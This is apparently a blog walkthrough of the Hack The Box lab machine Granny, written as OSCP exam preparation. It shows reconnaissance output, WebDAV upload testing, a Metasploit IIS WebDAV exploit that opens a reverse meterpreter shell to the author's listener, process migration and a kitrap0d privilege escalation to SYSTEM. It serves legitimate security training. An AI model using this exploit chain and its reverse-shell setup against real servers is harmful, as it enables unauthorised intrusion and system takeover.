Path to OSCP: Granny

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Granny up next. Nmap:

u01@nostromo:~$ nmap -p- -A granny.htb -oA HTB/granny/granny
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-16 08:55 IST
Nmap scan report for granny.htb (10.10.10.15)
Host is up (0.037s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan: 
| WebDAV type: Unknown
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ Server Date: Sat, 16 Sep 2023 07:57:07 GMT
|_http-title: Under Construction
| http-methods: 
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.33 seconds

Just a single port to investigate, HTTP, which shows us a Windows IIS “Under Construction” page:

We run a standard gobuster scan while checking the IIS version for any known exploits in searchsploit:

u01@nostromo:~$ searchsploit iis 6.0
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------

WebDAV is potentially promising and might be worth digging into later. I run Nikto against the URL:

u01@nostromo:~/HTB/granny$ nikto -h granny.htb
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.15
+ Target Hostname: granny.htb
+ Target Port: 80
+ Start Time: 2023-09-16 11:10:11 (GMT1)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ /: Retrieved microsoftofficewebserver header: 5.0_Pub.
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /Nv0JC1rp.asmx: Retrieved x-aspnet-version header: 1.1.4322.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /nikto-test-C0VT5oZn.html: HTTP method 'PUT' allows clients to save files on the web server. See: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
+ /nikto-test-C0VT5oZn.html: HTTP method 'DELETE' allows clients to delete files on the web server. See: https://cwe.mitre.org/data/definitions/650.html
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK .
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: WebDAV enabled (PROPPATCH MKCOL UNLOCK COPY LOCK PROPFIND SEARCH listed as allowed).
+ /: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll. See: https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2003/aa142960(v%3Dexchg.65)
+ /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709
+ /postinfo.html: Microsoft FrontPage default file found. See: CWE-552
+ /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_bin/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information). See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709
+ /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376
+ /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0114
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
+ 7965 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time: 2023-09-16 11:17:14 (GMT1) (423 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Most interesting result is “HTTP method ‘PUT’ allows clients to save files on the web server”. The gobuster scan has completed, revealing an empty /_private folder.

u01@nostromo:~$ gobuster dir -u http://granny.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://granny.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 148] [--> http://granny.htb/images/]
/Images (Status: 301) [Size: 148] [--> http://granny.htb/Images/]
/IMAGES (Status: 301) [Size: 148] [--> http://granny.htb/IMAGES/]
/_private (Status: 301) [Size: 152] [--> http://granny.htb/%5Fprivate/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

I kick off a scan of this folder for some common extensions while further investigating the allowed HTTP PUT method. I use davtest for a quick check, but no luck simply uploading files to the directory root:

u01@nostromo:~$ davtest -url http://granny.htb
********************************************************
Testing DAV connection
OPEN SUCCEED: http://granny.htb
********************************************************
NOTE Random string for this session: 7xvIJJVU
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT jhtml FAIL
PUT html FAIL
PUT jsp FAIL
PUT cfm FAIL
PUT php FAIL 
PUT shtml FAIL 
PUT asp FAIL 
PUT txt FAIL 
PUT aspx FAIL 
PUT pl FAIL 
PUT cgi FAIL 

********************************************************

Can’t quite tell at this stage if this is due to lack of authentication or another issue. I also tried the _private directory, but this was deemed not accessible or DAV not enabled. I also try cadaver but get a “500 Internal Server Error” with just about everything I try. Time to circle back to the Searchsploit exploits, this time narrowing down with WebDAV:

u01@nostromo:~/HTB/granny$ searchsploit webdav iis
------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow | windows/remote/1.c
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit) | windows/remote/41992.rb
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit) | windows/remote/16471.rb
Microsoft IIS - WebDAV XML Denial of Service (MS04-030) | windows/dos/585.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1) | windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2) | windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3) | windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4) | windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit) | windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Denial of Service | windows/dos/20664.pl
Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service | windows/dos/20854.txt
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service | windows/dos/22670.c
Microsoft IIS 5.0 - WebDAV Remote | windows/remote/2.c
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav) | windows/remote/51.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure | windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
------------------------------------------------------------------------------------------------------------- ---------------------------------

I still think the exploits related directly to IIS 6.0 seem the most promising, so I start working down through them, but with no lucky. The last exploit I have is a Python variant for the Metasploit WebDAV Write Access Code Execution exploit, in an attempt to avoid using Metasploit for OSCP exam purposes:

(py2venv) u01@nostromo:~/HTB/granny$ python iis_webdav_upload.py granny.htb test.txt

Microsoft IIS WebDAV Write Code Execution exploit
(based on Metasploit HDM's <iis_webdav_upload_asp> implementation)
Mariusz B. / mgeeky, 2016

Step 0: Checking if file already exist: "http://granny.htb/file3H9749.asp;.txt"
[*] File does not exists. That's good.

Step 1: Upload file with improper name: "http://granny.htb/file3H9749.asp;.txt"
Sending 652 bytes, this will take a while. Hold tight Captain!
[!] Upload failed. Status: 404

Originally I was getting a 500 status with this exploit, and after a reboot of the box began getting a 404. At this stage I’m pretty convinced there was previously a server issue, and this is confirmed by re-running the davtest, which now succeeds:

u01@nostromo:/repo/PEASS-ng/winPEAS/winPEASps1$ davtest -url http://granny.htb
********************************************************
Testing DAV connection
OPEN SUCCEED: http://granny.htb
********************************************************
NOTE Random string for this session: 9RFmdRv
********************************************************
Creating directory
MKCOL SUCCEED: Created http://granny.htb/DavTestDir_9RFmdRv
********************************************************
Sending test files
PUT cfm SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.cfm
PUT txt SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.txt
PUT jsp SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.jsp
PUT php SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.php
PUT pl SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.pl
PUT shtml FAIL
PUT cgi FAIL
PUT html SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.html
PUT asp FAIL
PUT aspx FAIL
PUT jhtml SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.jhtml
********************************************************
Checking for test file execution
EXEC cfm FAIL
EXEC txt SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.txt
EXEC txt FAIL
EXEC jsp FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC html SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.html
EXEC html FAIL
EXEC jhtml FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://granny.htb/DavTestDir_9RFmdRv
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.cfm
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.txt
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.jsp
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.php
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.pl
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.html
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.jhtml
Executes: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.txt
Executes: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.html

 

A little frustrated by this, I reach for Metasploit and get a shell literally within a few seconds!

msf6 exploit(windows/iis/iis_webdav_upload_asp) > options

Module options (exploit/windows/iis/iis_webdav_upload_asp):

Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The HTTP password to specify for authentication
HttpUsername no The HTTP username to specify for authentication
METHOD move yes Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy)
PATH /metasploit%RAND%.asp yes The path to attempt to upload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta
sploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.101 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic




View the full module info with the info, or info -d command.

msf6 exploit(windows/iis/iis_webdav_upload_asp) > set rhosts granny.htb
rhosts => granny.htb
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set lhost tun0
lhost => 10.10.14.6
msf6 exploit(windows/iis/iis_webdav_upload_asp) > run

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Checking /metasploit122431681.asp
[*] Uploading 610301 bytes to /metasploit122431681.txt...
[*] Moving /metasploit122431681.txt to /metasploit122431681.asp...
[*] Executing /metasploit122431681.asp...
[*] Deleting /metasploit122431681.asp (this doesn't always work)...
[*] Sending stage (175686 bytes) to 10.10.10.15
[!] Deletion failed on /metasploit122431681.asp [403 Forbidden]
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.15:1030) at 2023-09-16 13:38:52 +0100

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > sysinfo
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2924 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

I’m getting some permission errors with meterpreter, so I drop down to a standard command shell to find we’re in as a Network Service account.

I do some manually enumeration around the accessible directories, but nothing pops out, we have very limited file system access with this account. I attempt to upload winPEAS.ps onto C:\inetpub\, but get an error. Since I’ve already popped the Metasploit cherry on this box, I use multi/recon/local_exploit_suggester to find a suitable privilege escalation path.

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 186 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.15 - Valid modules for session 1:
============================

# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated. 
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated. 
6 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.

After attempting a number of these I’m getting the error “exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.” consistently. After a quick Google, it looks like I need to migrate to a process owned by Network Service:

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
200 1064 cidaemon.exe
272 4 smss.exe
288 1064 cidaemon.exe
320 272 csrss.exe
344 272 winlogon.exe
392 344 services.exe
404 344 lsass.exe
580 392 svchost.exe
668 392 svchost.exe
720 2204 svchost.exe x86 0 C:\WINDOWS\Temp\rad689F6.tmp\svchost.exe
736 392 svchost.exe
768 392 svchost.exe
788 392 svchost.exe
924 392 spoolsv.exe
952 392 msdtc.exe
1064 392 cisvc.exe
1112 392 svchost.exe
1168 392 inetinfo.exe
1204 392 svchost.exe
1312 392 VGAuthService.exe
1384 392 vmtoolsd.exe
1488 392 svchost.exe
1600 392 svchost.exe
1764 392 dllhost.exe
1944 392 alg.exe
1960 580 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2228 344 logon.scr
2512 580 wmiprvse.exe
2924 720 cmd.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\cmd.exe
4064 1064 cidaemon.exe

meterpreter > migrate 1960
[*] Migrating from 720 to 1960...
[*] Migration completed successfully.

We background the meterpreter session and try the suggested exploits again, getting a hit with ms10_015_kitrap0d to gain SYSTEM and obtain the flags:

msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 3444 launched.
[*] Reflectively injecting the DLL into 3444...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.6:4444 -> 10.10.10.15:1033) at 2023-09-16 14:25:33 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > dir "C:\\Documents and Settings\\Administrator\\Desktop\\"
Listing: C:\Documents and Settings\Administrator\Desktop\
=========================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-04-12 20:17:07 +0100 root.txt

Takeaway for OSCP

This was a frustrating box due to the server issues. I seemed to be on the right path for using PUT to upload a reverse shell as initial foothold and would likely have completed it without Metasploit if there hadn’t been any issues. I know this is part and parcel of exploitation, but frustrating nonetheless. I guess the takeaway here is to trust your gut instinct if you think the server is acting strangely and not to be afraid to reboot multiple times.

Leave a Reply

Your email address will not be published. Required fields are marked *